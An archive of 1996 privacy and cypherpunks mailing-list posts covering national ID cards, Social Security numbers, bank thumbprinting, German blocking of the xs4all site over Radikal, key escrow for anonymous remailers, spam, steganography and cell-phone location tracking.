If such an ID card is mandated, Latinos, Asians, and other Americans who "look foreign" or speak with an accent will be expected to produce this document far more often than other Americans, especially if they live in border areas. Increasing discrimination against our own citizens is no way to deal with the problem of illegal immigration. ...TANGLE CITIZENS IN GOVERNMENT RED TAPE. The federal bill requires any citizen that needs to use their birth certificate for official identification to get a reissued birth certificate from their place of birth by October 1999. Senior citizens that intend to apply for Medicare will need to obtain a new birth certificate. Couples engaged to be married will need new birth certificates for a marriage license and to change their names. Professionals traveling internationally for business or families going on vacation overseas will need new birth certificates to obtain passports. With millions of citizens requesting new birth certificates, lines and waits for federally-approved birth certificates will be long. All recipients will be charged a fee for their new birth certificates. ------------------------------- UPDATE: To study the full text of the Senate's version of H.R. 2202, go to http://thomas.loc.gov and look up S.1664, section 118. Write or call conferees and your own member of the House. As of Thursday, 8/29/96, 4:30 pm EDT, Senate conferees on the immigration bill were: Feinstein, Dianne - California Grassley, Chuck - Iowa Hatch, Orrin - Utah Kennedy, Edward - Massachusetts Kohl, Herb - Wisconsin Kyl, Jon - Arizona Leahy, Patrick - Vermont Simon, Paul - Illinois Simpson, Alan - Wyoming Specter, Arlen - Pennsylvania Thurmond, Strom - South Carolina Likely House conferees include: Becerra, Xavier - California (30) Berman, Howard - California (26) Bono, Sonny - California (44) Bryant, Ed - Tennessee (7) Bryant, John - Texas (5) Conyers, John, Jr. 
- Michigan (14)
Frank, Barney - Massachusetts (4)
Gallegly, Elton - California (23)
Goodlatte, Bob - Virginia (6)
Hyde, Henry - Illinois (6)
McCollum, Bill - Florida (8)
Smith, Lamar - Texas (21)

Please do not wait to contact House conferees. The conference report could be issued within as little as 24 hours of their final selection. To be most effective, letters should be postmarked by Saturday, August 31st, or faxed early the following week. Members' offices also may be reached by phone through the Capitol Switchboard (202) 224-3121. Thanks for your help.

------------------------------

Date: Fri, 16 Aug 96 15:24 EST
From: Robert Ellis Smith <0005101719 at mcimail.com>
Subject: Alternatives to Social Security Numbers

[ From Risks-Forum Digest; Volume 18 : Issue 35 -- MODERATOR ]

Last spring, I asked readers of RISKS for suggestions on alternatives to Social Security numbers in organizations with large data bases of information about individuals. Many such organizations find they do not need to use SSNs, and avoid privacy problems associated with using them. For a copy of all of the responses, send a request to us and specify whether you want hard copy or electronic edition of our August issue, and provide postal address or e-mail address. Robert Ellis Smith, Publisher, Privacy Journal newsletter, Providence, RI, 401/274-7861, e-mail 5101719 at mcimail.com.

Excerpts from the suggestions follow:

* FROM WASHINGTON, D.C.: Maryland uses Soundex (of name and birth date concatenated [linked in a chain]) both for driver and vehicle registrations.

* FROM CAMBRIDGE, MASS.: "Against Universal Health-Care Identifiers" in the JOURNAL OF THE AMERICAN MEDICAL INFORMATICS ASSOCIATION 1:316-319, 1994, by Dr. Peter Szolovits of MIT and Dr. Isaac Kohane of Children's Hospital in Boston, discusses a number of ways in which cryptography-based health care identifiers can be used to preserve privacy while remaining manageable for typical medical purposes.
This is publication #49 (in Postscript format) at http://medg.lcs.mit.edu/people/psz/publications.html. * FROM YARDLEY, PA.: One way is to use a simple scheme like three letters from last name, the first initial, and some digits; another is just to use sequential numbers. Another is an MD5 hash of the full-name string [a one-way mathematical function as a stand-in for the name that makes translation back to the original name impossible]. This is always unique for a unique string, so you might need to add some numbers. * FROM MADISON, WISC.: When I was working on the development of the Wisconsin Student Data Handbook - we tried to develop what we called an "SSN surrogate," also of nine bytes per individual. It involved an algorithm which combined year, month, and date of birth with sex and two consonants each extracted from the first and middle names. * FROM CYBERSPACE: I worked with a banking software company that set up employee records simply by exact hire date and time. Since they never hired anyone at exactly the same time, it gave each person a unique number. You could do the same for any data base in which records are added gradually one at a time - just number them based on exact date and time added. * FROM PALO ALTO, CAL.: At Stanford University we made a decision long ago not to use SSN for identification except where required by law (payroll taxes, for example). We use a unique Stanford University ID (SUID), which is a lifetime number and applies to all students, alumni, faculty, staff, and patients. It serves all the same purposes that the SSN would do if it were used. 
------------------------------ Date: Sat, 24 Aug 1996 00:25:15 -0400 From: Monty Solomon Subject: SSN and Welfare Legislation Excerpt from EPIC Alert 3.15 ======================================================================= [3] Welfare Legislation Signed by Clinton ======================================================================= On August 22, President Clinton signed the Personal Responsibility and Work Opportunity Reconciliation Act of 1996. The bill includes a number of sections that expand the use of the Social Security Number and create new databases of personal information. The bill requires that states obtain individuals' Social Security Numbers for many state documents. It provides that on "any application for a professional license, commercial driver's license, occupational license, or marriage license [the SSN] be recorded on the application." The new bill also creates a national database of every employee in the United States. States are also required to create databases of "new hires." The state databases would be uploaded to a federal registry and the Social Security Administration would verify the SSNs. The Commissioner of Social Security is required to develop "a prototype of a counterfeit-resistant social security card" made of tamper proof materials for proving citizenship, and to issue a report on the cost of issuing a new card to all citizens over a three, five or ten year period. More information on the welfare bill, the Social Security Number, and efforts to expand its use is available at: http://www.epic.org/privacy/ssn/ ------------------------------ Date: Fri, 30 Aug 1996 10:34:03 -0700 (PDT) From: jd at scn.org (Janeane Dubuar) Subject: fingerprinting by banks SEATTLE WEEKLY Copyright 1996 - used with permission July 24,1996 - "Quick and Dirty" column by Eric Scigliano Thumbprint, retinal or body-odor scan, sir? 
If you think those "Go to Jail" charity slumber parties are a scream, you may get a kick out of cashing checks after September 11. That's when US Bank will start requiring that non-customers cashing its checks consent to be finger--or, rather, thumb--printed. Other local banks are expected to join US Bank on the new security frontier in September, and at least one, Seafirst, plans to start taking thumbprints next year in step with its California parent, Bank America. The thumbprinting scheme is being pushed by the Washington Bankers Association, which wants all its members to take the plunge together. As Dan Doyle, regional manager over US Bank's Western Washington branches, notes, "I'm not sure any one bank wants to be the one to step out and do it--it probably sounds cold, hard, and not very customer-friendly." Indeed. "But it's really to protect customers." That protection is supposed to come from deterrence. Very few, if any, check forgers actually get caught via thumbprints in those states (most notably Texas, Nevada, and Arizona) whose banks already take them. Tellers can't (yet, anyway) check the prints for known forgers; the prints will merely be saved (on the checks themselves) for investigation in the event of a bounce. But Bruce Koppe, the Bankers Association's executive director, reports that bogus-check losses have declined by 40 percent in those states. Doyle says US Bank has charted 45 percent reductions in states where it's tried the system, and fewer than 1 percent of those asked decline to give prints. Some retailers, and reportedly at least one local credit union, are already taking prints on checks. Customers can at least be reassured that they won't have to bear the telltale black stains of traditional fingerprinting; the new "inkless" printing leaves no visible mark on the skin. 
Still, fingerprinting is, in the words of American Civil Liberties Union lobbyist Jerry Sheehan, "the archetypal metaphor of criminality, along with the mug shot and lineup." Some tellers are already grumbling at the prospect of having to do it. The banks take heart that they won't be demanding prints of their current customers. But the ill will may still come around to bite them; those are all potential customers they stand to infuriate, and account-holders may not like the idea of their checks being valid only when backed by thumbprints. And thumbprinting may be just the nose under the tent. That mixed bodily metaphor suits the brave new world of "biometric" identification in which we will, very soon, find ourselves. Down in Olympia, a working group of the joint Legislative Transportation Committee is considering what kind of biometric and/or computer technology to adopt in upcoming "smart" driver's licenses; its findings are due in December, preparatory to the next legislative session. Possibilities include a bar code or magnetic strip; a store scrutinizing your check or a cop writing a ticket could scan your full digitalized profile. All the drivers' license data that now fills a state warehouse could be consolidated in a single data base. And all those sci-fi and privacy-protectionist warnings about personal bar codes and instant snooping will come true. Transportation Committee staffer Jennifer Joly says that fingerprinting is still the most common form of biometric ID. But more exotic techniques are coming in: hand geometry scans, retinal scans, iris scans, computerized facial recognition, and (I am not making this up) body odor measurement. It seems unlikely that those who take IDs will stop at thumbprinting checks. Joly reports that bankers, retailers, and law-enforcement groups have joined in a coalition to weigh in on the new drivers' licenses. "We'll be pushing for legislation imposing severe restrictions" on fingerprinting, the ACLU's Sheehan vows. 
And they'll "continue to resist these pressures to create uniform identification papers from a document intended for driver's certification." [...] July 31, 1996 - "Quick and Dirty" column by Eric Scigliano [...] They want to know it all If you feel queasy about being fingerprinted by a bank, imagine how tellers feel about all the information they're supposed to disclose. US Bank asks employees to fill out an "extortion readiness card" listing all their cars (by number and "markings") and neighbors, the names, schools, and daily routes and schedules of their children, and any meetings they themselves regularly attend. US Bancorp spokeswoman Mary Ruble says taking such data is a longtime standard banking practice done for the employees' "own safety," to protect them in "hostage situations" and to help authorities "follow up if a claim of kidnapping is made." She adds that US Bank has never encountered such a situation, but believes other banks have. The cards are kept confidential in a central office, and filling them out is "voluntary for employees." But one bank worker who objected recalls being told to fill out the card anyway, and got the feeling, despite the explanation, that the intent was really to guard against crimes by, rather than against, employees. "The extortion readiness card has nothing to do with embezzlement," says Ruble. ----------------------------------------------------------------------------- The Internet PRIVACY Forum is a moderated digest for the discussion and analysis of issues relating to the general topic of privacy (both personal and collective) in the "information age" of the 1990's and beyond. The moderator will choose submissions for inclusion based on their relevance and content. Submissions will not be routinely acknowledged. All submissions should be addressed to "privacy at vortex.com" and must have RELEVANT "Subject:" lines; submissions without appropriate and relevant "Subject:" lines may be ignored. 
Excessive "signatures" on submissions are subject to editing. Subscriptions are by an automatic "listserv" system; for subscription information, please send a message consisting of the word "help" (quotes not included) in the BODY of a message to: "privacy-request at vortex.com". Mailing list problems should be reported to "list-maint at vortex.com". All messages included in this digest represent the views of their individual authors and all messages submitted must be appropriate to be distributable without limitations. The PRIVACY Forum archive, including all issues of the digest and all related materials, is available via anonymous FTP from site "ftp.vortex.com", in the "/privacy" directory. Use the FTP login "ftp" or "anonymous", and enter your e-mail address as the password. The typical "README" and "INDEX" files are available to guide you through the files available for FTP access. PRIVACY Forum materials may also be obtained automatically via e-mail through the listserv system. Please follow the instructions above for getting the listserv "help" information, which includes details regarding the "index" and "get" listserv commands, which are used to access the PRIVACY Forum archive. All PRIVACY Forum materials are available through the Internet Gopher system via a gopher server on site "gopher.vortex.com". Access to PRIVACY Forum materials is also available through the Internet World Wide Web (WWW) via the Vortex Technology WWW server at the URL: "http://www.vortex.com"; full keyword searching of all PRIVACY Forum files is available via WWW access. ------------------------------ End of PRIVACY Forum Digest 05.16 ************************ Date: 2 Sep 1996 13:52:18 -0500 From: "Dave Banisar" To: "Interested People" Subject: National ID Card Web Pages EXTENSIVE NATIONAL ID CARD WEB SITE IS NOW ON LINE The London-based human rights watchdog Privacy International (PI) has just opened an extensive web page on National ID cards. 
The initiative comes in the wake of pending efforts in the United States, Canada and United Kingdom to implement national ID card systems.

The page contains a 7,000 word FAQ (Frequently Asked Questions) on all aspects of ID cards and their implications. Also included in the PI documents is a paper describing successful campaigns opposing ID cards in Australia and other countries. The page also has links to numerous other sites and documents.

PI Director Simon Davies said he hoped the page would help promote debate about the cards, "ID cards are often introduced without serious discussion or consultation. The implications are profound, and countries planning to introduce them should proceed with caution."

"The existence of a card challenges important precepts of individual rights and privacy. At a symbolic and a functional level, ID cards are often an unnecessary and potentially dangerous white elephant. They are promoted by way of fear-mongering and false patriotism, and are implemented with scant regard for serious investigation of the consequences," he said.

The URL is: http://www.privacy.org/pi/activities/idcard/

PI has also set up an auto response function for the FAQ document. Its address is: idcardfaq at mail.privacy.org

Privacy International is an international human rights group concerned with privacy and surveillance issues. It is based in London, UK. For further information contact the Privacy International Washington Office at +1.202.544.9240 or email pi at privacy.org.
PI's web page is available at:

http://www.privacy.org/pi/

_________________________________________________________________________
Subject: National ID Card Web Pages
_________________________________________________________________________
David Banisar (Banisar at privacy.org) * 202-544-9240 (tel)
Privacy International Washington Office * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301 * HTTP://www.privacy.org/pi/
Washington, DC 20003

From tank at xs4all.nl Fri Sep 6 19:17:39 1996
From: tank at xs4all.nl (tank)
Date: Sat, 7 Sep 1996 10:17:39 +0800
Subject: German Government censors dutch site www.xs4all.nl
Message-ID: <199609062255.AAA09827@xs2.xs4all.nl>

Forwarded: a letter by Felipe Rodriquez, Managing Director XS4ALL

Hello,

This is an email I just wrote to Michael Schneider, the guy that advised German Internet providers to censor www.xs4all.nl and www.serve.com. He will probably forward the text to the German Public Prosecutor General, who should also read it. I try to make them understand that censoring is not very effective on the Net, and that they should stop it right now. At the same time I threaten to sue both of them for free-speech infringement and damages.

We'll see what happens. Censoring the Net is _the way_ to make bestsellers, when will the governments understand?

-------------------------------------------------------------------

Hello Michael,

> http://www.anwalt.de/ictf/p960901e.htm
>
> It now contains a digest of the complete occasion including parts of the
> letters I wrote to the Public Prosecutor General.

I read it yesterday. Thanks.

> I would appreciate, if you portray the activities of ICTF entirely and
> exactly.

I consistently state that the German providers were forced to censor by the Public Prosecutor. This is also what people understand from the press-releases we sent.

Even so the entire www.xs4all.nl website is blocked, with 3100 pages, in order to censor 1 single homepage.
Regardless who is responsible for the censor-actions, it is an outrage that 3100 xs4all customers are censored by Germany. Without a single phonecall, fax, email or letter to Xs4all internet or the user that placed the Radikal pages on our website. If there are pages that are not accepted by Germany, then Germany can always confront us, or the website owner, in a Dutch court of law.

It may interest you to know about some developments:

There are a number of mirrors for the Radikal site. All sorts of people have spontaneously started to copy the websites to their own system:

http://burn.ucsd.edu/%7Eats/RADIKAL/
http://www.jca.or.jp/~taratta/mirror/radikal/
http://www.serve.com/~spg/
http://huizen.dds.nl/~radikal
http://www.canucksoup.net/radikal/index.html
http://www.ecn.org/radikal
http://www.well.com/~declan/mirrors/
http://www.connix.com/~harry/radikal/index.htm
http://www.ganesa.com/radikal/
http://www.denhaag.org/~radikal

There are more mirrors than just these, but I did not get the entire list. According to the German General Prosecutor's opinion these sites would also need to be blocked. Expect the list of mirrors to grow, and expect to be forced to block that growing list of sites on the Net. Realize that a lot of internetusers consider it a sport to redistribute censored information. The way to write a bestseller on the Net is to have it censored by some government. It has the opposite effect.

The entire issue 154 of Radikal has been posted in German newsgroup by anonymous users.

German users can still use remote (non-german) proxy-servers to access all the Radikal information on Internet. People have posted information about these remote proxyservers in German newsgroups.

Xs4all uses rotating IP-numbers for its services. The IP-numbers of certain sites and services are changed every couple of hours. A static ip-filter would certainly not be enough to block www.xs4all.nl.
We have asked our parliament and department of Foreign Affairs to help us fight this blunt German censorship. We have also asked the EFF, CPSR and EPIC for advice, and to spread our press-release. A fax was also sent to CNN, Wired, and other press-services.

We have discussed starting legal procedures against Germany and the ICTF with our lawyer. If any political and diplomatic actions fail to stop this act of blunt censorship, then we will most probably start litigation against the German government and the ICTF, for damages and violation of the European right on free-speech. It is clear that censoring 3100 pages, to prevent one of them from being published, is an infringement of European free-speech legislation.

We have advised the provider behind www.serve.com, that is also censored, to engage in the same kind of procedures.

Please inform the German Public Prosecutor General that the censoring actions have been ineffective, and that Radikal is now on many different websites and is being distributed widely on the entire Internet. Continuing to block this growing list of sites would be an impossible task, what happens if Germany demands to block AOL, EFF, Compuserve, Prodigy, The Well, Netcom and Demon Internet next week ? Providers would be forced to block large part of Internet. I don't think that's what anyone would like to happen.

Kind regards,
Felipe Rodriquez

--
Felipe Rodriquez - XS4ALL Internet - finger felipe at xs4all.nl for
http://xs4all.nl/~felipe/ - Managing Director - pub pgp-key 1024/A07C02F9

From mab at research.att.com Fri Sep 6 19:24:49 1996
From: mab at research.att.com (Matt Blaze)
Date: Sat, 7 Sep 1996 10:24:49 +0800
Subject: Job for netescrow ? (was Secure anonymouse server protocol...
In-Reply-To: <199609061322.OAA01150@server.test.net>
Message-ID: <199609062250.SAA13820@nsa.research.att.com>

Adam Back writes:
>
>Peter Allan writes on cpunks:
>> In the talk about replyable nym-mailers I haven't
>> yet seen netescrow mentioned.
>>
>> You DID all read this ?
>>
>> [Matt Blaze's Oblivious Key Escrow paper]
>>
>> This all hinges on a policy to be followed by archive holders defining
>> the conditions under which they release their shares.
>> This could be receipt of a signed request from the owner (remailer).
>>
>> Maybe the table relating nyms to reply addresses could be stored in
>> netescrow style so that captured remailers reveal nothing. The problem
>> of operator coercion is not addressed by this.
>
>Just to clarify, if I understand correctly you are proposing a penet
>style system with the database held in `netescrow'.
>
>The remailer in normal operation has access to the database by making
>requests satisfying the conditions of the secret share holders.
>
>When the remailer is compromised the memory resident key is lost when
>the machine is switched off, and the owner refuses to release the key.
>
>Is this what you are proposing?
>
>It sounds like a cross between Matt's netescrow and Ross Anderson's
>eternity file system. Your penet database is being stored in a
>distributed file system, with shares, and the identity of the share
>holders is concealed. However the aim is not to prevent others
>censoring your publicly available writings, but to allow a second
>avenue of access only in the case of `mob cryptography'.
>
>This changes the system over storing the database encrypted on the
>remailer machine's own disk in these ways:
[well-thought-out stuff deleted]

This is the first I've seen this proposal to use Oblivious Key Escrow (OKE) as a store for a remailer database; apologies if all this has been discussed already (I don't read cypherpunks very often these days).

My original idea for OKE was as a way to backup long-term, slow-changing sensitive data without also introducing a single point of failure for either security or availability.
The remailer model is a bit different, and I'm not sure it's a good fit, in particular because I haven't thought about the various new failure modes in this application. But let me think ``out loud.''

Suppose we want to build a persistent-reply address anonymous messaging service (like the late anon.penet.fi) with the following properties:

a) The database that maps anonymous addresses to real addresses is secure against erasure or other permanent loss of availability

b) The database is also secure against accidental or coerced disclosure.

Requirement (a) implies backups and persistent storage. Requirement (b) implies that access to both operational and backup copies must be carefully controlled, preferably by technical means. So far, this looks like a good candidate for distributed security, in the style of OKE, Mike Reiter's Rampart service, or Ross Anderson's Eternity service.

Actually, I think the best solution would be for the remailer itself to be a distributed process, split among enough places to make it difficult for anyone to attack enough nodes to compromise or recover the address translation database. It is not at all obvious how to do this in practice, however, since any solution would need to combine secure distributed computation (to calculate the mapping for each message sent without revealing to any party, including the sender, what the mapping is) with anonymous networking techniques such as mixes to prevent traffic analysis from revealing the mapping. There are a number of unsolved theoretical and practical problems here, and I think working out the details of such a system would make for a good PhD thesis or two (quite seriously, and I'd be interested in talking with anyone who wanted to pursue such a line of research).

So for now let's limit ourselves to existing tools and techniques, or at least tools and techniques that are close to existing. Let's say, for the moment, that we wanted to base the system on OKE.
Assume an unconditionally trusted remailer operator whose goal is to construct a system that resists attempts to force him or her to UNILATERALLY reveal the database. That is, it should not be possible to force the remailer operator to reveal the database contents without also enlisting the aid of the (collectively anonymous) oblivious key holders.

My (not carefully considered) first thought is that the address database would be encrypted and stored locally, using a key that is escrowed using OKE. The key would never be locally stored; preferably, the key would exist only in memory. The operating system on which the remailer is run would delete this key ``at the drop of a hat,'' e.g., any time the system was rebooted, any time someone logs in, any time unusual activity of any sort is detected.

The key release policy is controlled by a public key, for which the secret key is stored in a more persistent manner (e.g., in the file system). Whenever the database key is deleted, the OKE recovery process is used to recover the key automatically, and the database is re-encrypted with a new key that is distributed to a new set of shareholders. Under normal operation, this might happen once a month or so, and might entail (because of policy-based delays and the time required to collect shares) a few days of downtime.

Under unusual conditions that might precipitate some kind of coercive situation, the remailer operator (or some automatic process on the remailer machine) would delete the signing key as well as the database. It might be reasonable, for example, to delete this file any time someone logs in to the remailer machine (which shouldn't be needed ordinarily). The OKE share policy would require that the shareholder operator examine unsigned key requests manually before releasing them. If the keys were deleted because of a false alarm or machine failure, the remailer operator would send a message saying something to the effect of ``Hey, I blew it.
Please send me the key shares once you're convinced no one has a gun to my head.'' In the event of a public safety emergency, the police are free to attempt to issue their own appeal for key shares, but the ability for them to do this is not a design goal, but rather a side-effect of the design.

I see a number of problems with using OKE for this. In particular, key recovery is moderately expensive and key distribution with the oblivious multicast protocol in my paper can be very expensive. If keys are deleted regularly, the downtime could be unacceptable. I'm not sure OKE is entirely workable for this application, but perhaps a more clever design could prove me wrong. There are a whole bunch of engineering issues here, particularly related to automatically detecting ``unusual'' situations.

So can this scheme be improved upon? Is there a better way to run a persistent-reply-address remailer? These are interesting, and I think largely open, questions.

-matt

NB The oblivious key escrow paper that I presented at the Information Hiding workshop at the Isaac Newton Institute in May, is available at:
ftp://ftp.research.att.com/dist/mab/netescrow.ps

From rwright at adnetsol.com Fri Sep 6 19:49:41 1996
From: rwright at adnetsol.com (Ross Wright)
Date: Sat, 7 Sep 1996 10:49:41 +0800
Subject: Court challenge to AOL junk-mail blocks
Message-ID: <199609062352.QAA20226@adnetsol.adnetsol.com>

On Or About: 6 Sep 96 at 18:04, E. Allen Smith wrote:

> list-managers list, a consent arrangement would thus be preferable. The
> other argument of the Cyber Promotions jerks is nonsense - how does AOL
> blocking affect the rest of the Internet?

It's affecting the rights of these fine spammers, Cyber Promotions. That affects spammers everywhere. More rules by our government affects all of us.

> >PHILADELPHIA, Pa. (Sep 6, 1996 12:23 p.m.
EDT) -- A federal judge has

<<<>>>>

> >"We feel that America Online has violated the civil rights of their
> >members and has violated our rights to send e-mail through the Internet,
> >which AOL does not own," he said.
>
> >Although unsolicited mail sent through the post office in the United
> >States is not considered illegal, the rules have yet to be defined in
> >cyberspace.

That's the real point I have always made. No rules and we should not want rules. Why are we INVITING the government into OUR internet??? Just cause we have to read spam? That is just plain stupid!!! Just cause we have to read spam, oh well, let the government come on in. Do we let the government into our bedrooms because our wife says no to sex tonight or because we don't like to make our beds??

Everyone on this list seems to want to limit government intervention EXCEPT when it comes to spam, then every one just holds the door open wide and let them in. If they get that inch, they WILL take the whole 9 YARDS!!!!!! Get a clue, delete or killfile those who spam and keep the government out of cyberspace!!!!!!

By the way, I get about 2 or 3 spams a day in my mailbox and it is not killing me! Don't get the wrong idea, I don't like it. I like the government WAY LESS!!!!!

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906

From jf_avon at citenet.net Fri Sep 6 20:01:27 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Sat, 7 Sep 1996 11:01:27 +0800
Subject: Race Bit: C
Message-ID: <9609062346.AA24494@cti02.citenet.net>

On 6 Sep 96 at 10:50, jim bell wrote:

> Since red liquid running in the streets is generally so reviled, one
> of the things which mystifies me is why there aren't more
> simulation-type programs used to test out hypotheticals, for example
> a "SimEconomy."
For example, you'll occasionally hear about a
> media news organization gathering a dozen or so volunteers in a
> room, and asking them to solve a problem like "The Budget Deficit"
> or some such. The result of their interplay is generally used to
> explain why these problems are hard to solve.

Why do you suppose that solving the problem they created is their goal?

On a more fundamental level, why do you assume that their goal is to improve life at all?

Ask yourself if this is what they truly want.

jfa

Jean-Francois Avon, Montreal QC Canada
DePompadour, Societe d'Importation Ltee
Limoges porcelain, silverware and crystal
JFA Technologies, R&D consultant
physicists, technologists and engineers
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891

From jf_avon at citenet.net Fri Sep 6 20:06:35 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Sat, 7 Sep 1996 11:06:35 +0800
Subject: What the NSA is patenting
Message-ID: <9609062352.AA24858@cti02.citenet.net>

A maybe useful program would be a little tsr that constantly overwrites unused sectors of the entire drive with random patterns (maybe seeded with a fast keyboard interval timer). Like at the very moment I am writing this, my HD has been idle for several minutes...
One more of my silly ideas JFA Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Limoges porcelain, silverware and crystal JFA Technologies, R&D consultant physicists, technologists and engineers PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From nobody at replay.com Fri Sep 6 20:36:52 1996 From: nobody at replay.com (Name Withheld by Request) Date: Sat, 7 Sep 1996 11:36:52 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL Message-ID: <199609070035.CAA06972@basement.replay.com> >A Modest Proposal: > >* as Germany is bent on blocking sites which carry this subversive >pamphlet, "Radikal," let us mirror it on thousands of sites around the >world. > >* when the Germans went into Danmark and insisted Jews wear badges, >ordinary citizens (and the Danish Royal Family, as I recall) also took to >wearing these Star of David badges. Add this plug to signatures and web pages: ----------------------------------------------------------------------- Lebt und lest radikal! http://www.xs4all.nl/~tank/radikal/ ----------------------------------------------------------------------- Then, your messages are "promoting a terrorist organization" (cf. http://www.anwalt.de/ictf/p960901e.htm) and may no longer be carried in Germany. [It just says to live radically, and to read "radikal". But "radikal" is a terrorist magazine after all.] From jya at pipeline.com Fri Sep 6 20:37:47 1996 From: jya at pipeline.com (John Young) Date: Sat, 7 Sep 1996 11:37:47 +0800 Subject: GAM_lin Message-ID: <199609070046.AAA03599@pipe1.t2.usa.pipeline.com> 8-8-96. Wash Tech: "Internet Betting Spurs Regulatory Interest." A new commission to investigate the nation's $40 billion gambling industry will initiate Congress' latest effort to curb the fast-growing gambling industry, and may open up additional efforts to regulate the burgeoning Internet industry. 
Extra legislation is not needed to suppress on-line gambling, said Bernie Horn, National Coalition Against Legalized Gambling. "If the Justice Department wanted to, it could make things unbearable for companies offering on-line gambling from outside the country," he said.

-----

http://jya.com/gamlin.txt (5 kb)

GAM_lin

Thanks to BC.

From dfloyd at io.com Fri Sep 6 21:03:01 1996
From: dfloyd at io.com (Douglas R. Floyd)
Date: Sat, 7 Sep 1996 12:03:01 +0800
Subject: Steganography -- Tell-tale signs?
In-Reply-To: <199609051651.JAA06856@sirius.infonex.com>
Message-ID: <199609070003.TAA11985@pentagon.io.com>

>
> Hi there!
>
> I'd appreciate some help from you experts in
> steganography.
>
> 1) If I hide some PGP encrypted data in a
> gif, jpg or wav file will there be any tell tale
> signs to the naked eye of an expert? If yes,
> what are they?

If you stego too many bits in a figure, it may become apparent.

>
> 2) Would it better to hide the data in
> a jpg with black and white image rather
> than a color one?
>

24 bit color has more data, therefore it's easier to hide random data.

> 3) Are there any tools at the moment
> to expose (not crack) the hidden encrypted
> data? If none, are there tools in development?

Not really. If you make sure there are no predictable headers, and use a good encryption algorithm, it is almost impossible to tell the presence of a hidden file unless you compare a file untouched with the one with data in it.

>
> If this appears twice please accept my apologies.
> I didn't see the first posting and so I assumed it
> was lost in transit. Please email replies to me
> directly if this is off-topic. Thank you.
>
> Makofi
>

From jimbell at pacifier.com Fri Sep 6 21:08:32 1996
From: jimbell at pacifier.com (jim bell)
Date: Sat, 7 Sep 1996 12:08:32 +0800
Subject: Cellular phone tracing
Message-ID: <199609070057.RAA25948@mail.pacifier.com>

At 05:49 PM 9/6/96 EDT, E.
Allen Smith wrote:
> From comp.risks:
>
>Date: Mon, 2 Sep 1996 22:24:13 -0400 (EDT)
>From: glassman at sunsite.unc.edu
>Subject: FedEx monitoring of cellular phonecall locations
>
>[...] nowhere near either of those places, so I did not bother to mention my
>current location to the operator. The next day, Saturday, I called FedEx
>with the same cell phone from Blowing Rock to arrange the pickup. The
>operator immediately asked if I wanted them to come to the intersection that
>I had placed my call from the day before.
>
>Two days later, a FedEx operator confirmed that they are getting "new
>systems" at some locations that are able to record the locations from which
>cellular calls are placed.
>
>I have now asked Cellular One three times to explain to me why they do not
>tell subscribers that they pass this location information through the
>system, but to no avail. [...]
>
>========== end fwd.

You should DEFINITELY start worrying when the FedEx operator says something like, "I see you're the guy in the red shirt and brown pants."

Jim Bell
jimbell at pacifier.com

From janzen at idacom.hp.com Fri Sep 6 21:16:38 1996
From: janzen at idacom.hp.com (Martin Janzen)
Date: Sat, 7 Sep 1996 12:16:38 +0800
Subject: Junk Phone Calls, Metered Usage, and Cellphones
Message-ID: <9609070109.AA29863@sabel.idacom.hp.com>

tcmay at got.net (Timothy C. May) writes:
>I am about to start worrying about "junk phone calls" more so than I have
>been. I just bit the bullet and bought a digital cellular phone, with a
>nifty rate plan called Digital Flex: I get unlimited free airtime from 7
>p.m. to 7 a.m. weekdays, and unlimited free airtime all weekend. From south
>of Salinas to north of Santa Rosa and as far east as the Central Valley. In
>other words, the entire Bay Area and outlying communities. I can send and
>receive calls over this entire region, from anywhere in the region (of
>course), without any charges.
>
>The downside is that calls _from_ or _to_ my phone during "business" hours
>are charged 42 cents a minute, airtime (tying up a channel and all), plus
>whatever other fees may be applicable at each end. Thus, every "junk call"
>I get trying to get me to buy aluminum siding, or to vote Democratic, or to
>switch my long-distance carrier (!), costs me a minimum of 42 cents,
>depending on how fast I can realize who they are and get rid of them

I have a similar plan. My cell phone company includes call forwarding in the package, so I deal with the possibility of junk calls by forwarding calls from my cell phone to my regular number (which has voicemail) during the day, then turning off the cell phone.

This way, the calls are intercepted right at the switch (I assume), so no airtime is used, and no charges are incurred. Works for me...

--
Martin Janzen janzen at idacom.hp.com

From alano at teleport.com Fri Sep 6 21:58:08 1996
From: alano at teleport.com (Alan Olsen)
Date: Sat, 7 Sep 1996 12:58:08 +0800
Subject: Metcalf and Other Net.Fogies
Message-ID: <3.0b15.32.19960906182157.0101cd6c@mail.teleport.com>

At 10:27 AM 9/5/96 -0700, Timothy C. May wrote:
>Robert Metcalfe, inventor of Ethernet and founder of 3COM, and now
>publisher of "Infoworld" and sailing enthusiast, was interviewed on CNBC a
>few minutes ago. He repeated his prediction of an "Internet collapse" in
>1996, based on overuse, on bad pricing models, on lack of controls, and on
>other concerns.

Some are griping just to gripe. Metcalfe may have a valid prediction here.

I have a machine that I use for work that is connected to the net via ethernet. No 28.8k bottlenecks involved. Most of the time I am lucky if I can exceed 14K bps to anything outside the local area. When I run traceroutes, the blockage is in MCI or Sprintnet land. (Except for the one to ftp.funet.fi early this week where two of the machines somewhere in California were caught in some sort of weird DNS loop.)
The bandwidth to the net has been oversold. If the government were *Really* concerned about "protecting the net", they would be on MCI and Sprint's cases, not looking for virtual terrorists. (Virtual Terrorists are to Terrorists the same way that Virtual Reality is to actual reality.) There have been days where you could not move anything at any reasonable speed from certain areas of the country.

Yes, people have been predicting the end of the net (GIF/JPEG/WAV at 11!) since it was founded. In this case, I think that the person has enough network experience to be right. With the way things are now with oversold bandwidth, the DNS numbers getting close to being used up, many of the routers needing to be replaced and/or upgraded, and software that uses bandwidth like candy (phone conversations, video conferencing, huge interactive web page animations (like shockwave), real audio, and more as the marketing droids can sell you on it.), the chances of a west coast power-system style collapse does not seem that far from reality. (There are many who I know in the industry that are amazed that it has lasted this long.)

